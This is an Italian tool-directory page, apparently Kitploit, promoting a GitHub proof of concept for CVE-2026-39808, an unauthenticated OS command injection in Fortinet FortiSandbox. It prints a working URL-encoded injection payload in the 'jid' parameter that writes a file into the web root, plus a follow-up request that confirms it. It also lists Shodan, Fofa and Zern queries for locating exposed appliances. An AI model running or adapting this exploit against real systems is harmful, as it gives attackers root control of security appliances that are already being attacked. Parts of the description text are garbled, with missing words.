Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - Iniezione di comandi del sistema operativo tramite endpoint tracer-behavior | Kitploit
Strumenti/GitHubGitHub/error-inside/cve-2026-39808
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - Iniezione di comandi del sistema operativo tramite endpoint tracer-behavior

Vedi Repository
152 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 - Iniezione di comandi del sistema operativo tramite endpoint tracer-behavior

Fortinet FortiSandbox è una soluzione avanzata di protezione dalle minacce che crea ambienti isolati per analizzare file, URL e traffico di rete sospetti alla ricerca di comportamenti dannosi. Combina analisi statica, analisi dinamica, machine learning basato su intelligenza artificiale e threat intelligence di FortiGuard per rilevare minacce zero-day, malware evasivo, ransomware e attacchi mirati che aggirano le difese tradizionali basate su firme. Le aziende dovrebbero implementare FortiSandbox per proteggersi dalle minacce emergenti, in particolare malware sconosciuti e minacce persistenti avanzate (APT); la soluzione fa detonare automaticamente i contenuti sospetti in un ambiente sicuro e isolato prima che raggiungano i sistemi di produzione. Si integra con la più ampia Fortinet Security Fabric e può essere implementata come appliance fisica, macchina virtuale, servizio cloud o soluzione containerizzata per adattarsi a diverse architetture di rete.

è una che interessa le versioni di FortiSandbox dalla alla . Il difetto deriva da una neutralizzazione non corretta di elementi speciali nell'input controllato dall'utente prima che venga utilizzato nella costruzione di comandi del sistema operativo (CWE-78) e interessa in particolare un endpoint API non specificato. Un attaccante non autenticato può sfruttare questa vulnerabilità inviando richieste HTTP appositamente formulate per eseguire con sul sistema sottostante. Uno sfruttamento riuscito concede all'attaccante il controllo completo sull'appliance , consentendogli di accedere ai campioni di malware analizzati, esfiltrare dati di configurazione sensibili, spostarsi verso segmenti di rete collegati o utilizzare il dispositivo compromesso come punto d'appoggio per ulteriori movimenti laterali all'interno dell'ambiente aziendale. Questa vulnerabilità è attualmente oggetto di sfruttamento attivo in the wild.

CVE-2026-39808
vulnerabilità critica di iniezione di comandi del sistema operativo
4.4.0
4.4.8
comandi arbitrari del sistema operativo
privilegi di root
FortiSandbox

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

Utilizzo

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

Risorse

  • OpenCVE - CVE-2026-39808 - Iniezione di comandi del sistema operativo nelle versioni 4.4.x di FortiSandbox
  • NIST - Dettaglio CVE-2026-39808
  • Fortinet FortiSandbox

Disclaimer

Questo repository e i suoi contenuti sono forniti strettamente per ricerca di sicurezza legittima, test di penetrazione autorizzati, studio educativo e finalità difensive. Accedendo o utilizzando questo materiale, riconosci la piena responsabilità di garantire che le tue attività siano conformi a tutte le leggi applicabili e di aver ottenuto la dovuta autorizzazione prima di testare o applicare queste tecniche a qualsiasi sistema che non possiedi.

Gli autori e i manutentori di questo progetto non si assumono alcuna responsabilità per danni, conseguenze legali o usi impropri derivanti dall'applicazione di queste informazioni. Qualsiasi uso per accesso non autorizzato, attività dannose o scopi illegali è espressamente vietato e non supportato.

Usa in modo responsabile. Rispetta la legge. Testa solo ciò che possiedi o per cui hai esplicita autorizzazione scritta.

Autori

  • ErrorInside // SCT

Licenza

SCT-PL

Scarica lo strumento